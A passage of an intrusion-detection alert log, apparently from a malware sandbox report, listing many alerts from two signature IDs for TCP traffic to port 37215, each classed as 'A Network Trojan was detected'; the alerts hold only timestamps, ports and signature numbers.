              Timestamp:05/24/24-10:59:02.481435
              SID:2829579
              Source Port:55316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394861
              SID:2829579
              Source Port:53572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481996
              SID:2829579
              Source Port:55002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393916
              SID:2835222
              Source Port:42188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456962
              SID:2829579
              Source Port:42730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546211
              SID:2835222
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581795
              SID:2829579
              Source Port:47840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100502
              SID:2835222
              Source Port:34652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300101
              SID:2835222
              Source Port:53066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506833
              SID:2835222
              Source Port:44222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537225
              SID:2835222
              Source Port:36904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341348
              SID:2835222
              Source Port:34608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548201
              SID:2829579
              Source Port:50430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400703
              SID:2835222
              Source Port:34572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501882
              SID:2835222
              Source Port:37744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054309
              SID:2829579
              Source Port:51734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856924
              SID:2829579
              Source Port:51714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624812
              SID:2835222
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247660
              SID:2829579
              Source Port:38536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522251
              SID:2835222
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155759
              SID:2829579
              Source Port:38672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459829
              SID:2835222
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537305
              SID:2829579
              Source Port:42146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186941
              SID:2829579
              Source Port:51340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624777
              SID:2829579
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969209
              SID:2835222
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102369
              SID:2829579
              Source Port:39562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057284
              SID:2829579
              Source Port:47612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340881
              SID:2829579
              Source Port:53056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078202
              SID:2829579
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638901
              SID:2835222
              Source Port:46716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198796
              SID:2829579
              Source Port:60018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487396
              SID:2835222
              Source Port:50254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543864
              SID:2835222
              Source Port:48078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249806
              SID:2829579
              Source Port:34742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449206
              SID:2829579
              Source Port:57578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526887
              SID:2829579
              Source Port:34596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531873
              SID:2835222
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860072
              SID:2835222
              Source Port:45096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360632
              SID:2829579
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231807
              SID:2835222
              Source Port:53726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404399
              SID:2829579
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103068
              SID:2835222
              Source Port:47742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303239
              SID:2835222
              Source Port:53794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188077
              SID:2829579
              Source Port:34044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538133
              SID:2829579
              Source Port:53388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303388
              SID:2829579
              Source Port:52698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208214
              SID:2829579
              Source Port:43038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282914
              SID:2835222
              Source Port:55840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198778
              SID:2829579
              Source Port:42322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574614
              SID:2829579
              Source Port:54990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493173
              SID:2829579
              Source Port:56674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923970
              SID:2835222
              Source Port:47180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2829579
              Source Port:38178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194376
              SID:2829579
              Source Port:37478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462933
              SID:2835222
              Source Port:38214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062748
              SID:2835222
              Source Port:46044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105488
              SID:2835222
              Source Port:57316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965797
              SID:2829579
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639950
              SID:2835222
              Source Port:54056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116279
              SID:2835222
              Source Port:45608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621944
              SID:2829579
              Source Port:36664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358600
              SID:2829579
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759855
              SID:2829579
              Source Port:58306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625297
              SID:2829579
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873914
              SID:2829579
              Source Port:41068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431263
              SID:2829579
              Source Port:48488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459765
              SID:2835222
              Source Port:42374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396700
              SID:2829579
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430773
              SID:2835222
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406355
              SID:2835222
              Source Port:35356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535215
              SID:2835222
              Source Port:50844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156280
              SID:2835222
              Source Port:47440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109518
              SID:2829579
              Source Port:44648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764052
              SID:2835222
              Source Port:39208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629466
              SID:2829579
              Source Port:44820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856881
              SID:2835222
              Source Port:41710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361549
              SID:2835222
              Source Port:40284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360875
              SID:2829579
              Source Port:44086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200777
              SID:2829579
              Source Port:51524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165181
              SID:2835222
              Source Port:50014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120560
              SID:2829579
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421002
              SID:2835222
              Source Port:60608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456416
              SID:2829579
              Source Port:58214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435421
              SID:2835222
              Source Port:54480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763252
              SID:2829579
              Source Port:42938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920251
              SID:2829579
              Source Port:49184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624110
              SID:2835222
              Source Port:35282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764381
              SID:2829579
              Source Port:53756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662624
              SID:2829579
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.757297
              SID:2829579
              Source Port:37340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396167
              SID:2835222
              Source Port:36412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582671
              SID:2829579
              Source Port:58576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486871
              SID:2829579
              Source Port:57552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595541
              SID:2835222
              Source Port:32930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108548
              SID:2829579
              Source Port:47246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522534
              SID:2835222
              Source Port:33062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459512
              SID:2829579
              Source Port:49312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102427
              SID:2835222
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483092
              SID:2829579
              Source Port:35094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101622
              SID:2835222
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837391
              SID:2829579
              Source Port:45870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583942
              SID:2835222
              Source Port:46206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232650
              SID:2835222
              Source Port:39464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575477
              SID:2835222
              Source Port:35842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420902
              SID:2835222
              Source Port:49922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282418
              SID:2829579
              Source Port:52702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235217
              SID:2835222
              Source Port:43916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361089
              SID:2835222
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492344
              SID:2829579
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803072
              SID:2829579
              Source Port:52774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116590
              SID:2835222
              Source Port:59694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816026
              SID:2835222
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402859
              SID:2835222
              Source Port:46938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.862020
              SID:2829579
              Source Port:48972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918141
              SID:2829579
              Source Port:46414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397180
              SID:2829579
              Source Port:38346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585186
              SID:2829579
              Source Port:45046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201755
              SID:2835222
              Source Port:54138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536384
              SID:2835222
              Source Port:53282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390569
              SID:2835222
              Source Port:36598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397777
              SID:2835222
              Source Port:40648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077889
              SID:2835222
              Source Port:42914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347787
              SID:2835222
              Source Port:58318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.158791
              SID:2835222
              Source Port:37934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456434
              SID:2829579
              Source Port:59912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549297
              SID:2829579
              Source Port:50644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361526
              SID:2829579
              Source Port:42824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233722
              SID:2829579
              Source Port:40930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189447
              SID:2835222
              Source Port:43078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965558
              SID:2829579
              Source Port:49330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540761
              SID:2835222
              Source Port:40014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703575
              SID:2829579
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076964
              SID:2829579
              Source Port:56500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483773
              SID:2835222
              Source Port:34276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484952
              SID:2829579
              Source Port:40460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726581
              SID:2829579
              Source Port:41294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329677
              SID:2835222
              Source Port:51972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118298
              SID:2829579
              Source Port:49168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329740
              SID:2829579
              Source Port:50754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537720
              SID:2835222
              Source Port:37146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365310
              SID:2829579
              Source Port:33250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167536
              SID:2835222
              Source Port:59264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886042
              SID:2829579
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594710
              SID:2835222
              Source Port:59532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099620
              SID:2829579
              Source Port:43680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103690
              SID:2829579
              Source Port:41730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107881
              SID:2829579
              Source Port:45490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501464
              SID:2835222
              Source Port:33642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115114
              SID:2835222
              Source Port:50626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332189
              SID:2835222
              Source Port:49566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923744
              SID:2835222
              Source Port:37602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579207
              SID:2835222
              Source Port:39764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671784
              SID:2835222
              Source Port:55152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727002
              SID:2829579
              Source Port:57622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404611
              SID:2835222
              Source Port:42806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347768
              SID:2835222
              Source Port:40986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117316
              SID:2835222
              Source Port:51584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460596
              SID:2835222
              Source Port:34750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459068
              SID:2835222
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443647
              SID:2835222
              Source Port:53338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151243
              SID:2829579
              Source Port:42528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361526
              SID:2835222
              Source Port:33436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517917
              SID:2835222
              Source Port:55604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368452
              SID:2835222
              Source Port:41172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369072
              SID:2835222
              Source Port:48986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534440
              SID:2829579
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482925
              SID:2835222
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886025
              SID:2835222
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637765
              SID:2835222
              Source Port:39380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235712
              SID:2829579
              Source Port:33400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507560
              SID:2835222
              Source Port:42106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801635
              SID:2835222
              Source Port:49850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123461
              SID:2829579
              Source Port:36178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.820776
              SID:2829579
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625245
              SID:2835222
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725516
              SID:2835222
              Source Port:47904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429735
              SID:2829579
              Source Port:60584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100010
              SID:2835222
              Source Port:34246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150786
              SID:2829579
              Source Port:52724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368797
              SID:2829579
              Source Port:42706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480161
              SID:2835222
              Source Port:44528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744776
              SID:2829579
              Source Port:36054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536018
              SID:2829579
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639851
              SID:2829579
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764072
              SID:2829579
              Source Port:57886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400774
              SID:2835222
              Source Port:42076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200995
              SID:2829579
              Source Port:32780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530905
              SID:2829579
              Source Port:55234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581978
              SID:2835222
              Source Port:44464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727058
              SID:2835222
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924316
              SID:2835222
              Source Port:47186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078525
              SID:2835222
              Source Port:37690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431578
              SID:2835222
              Source Port:41550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252636
              SID:2835222
              Source Port:37010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727375
              SID:2829579
              Source Port:48038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449127
              SID:2835222
              Source Port:37754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856535
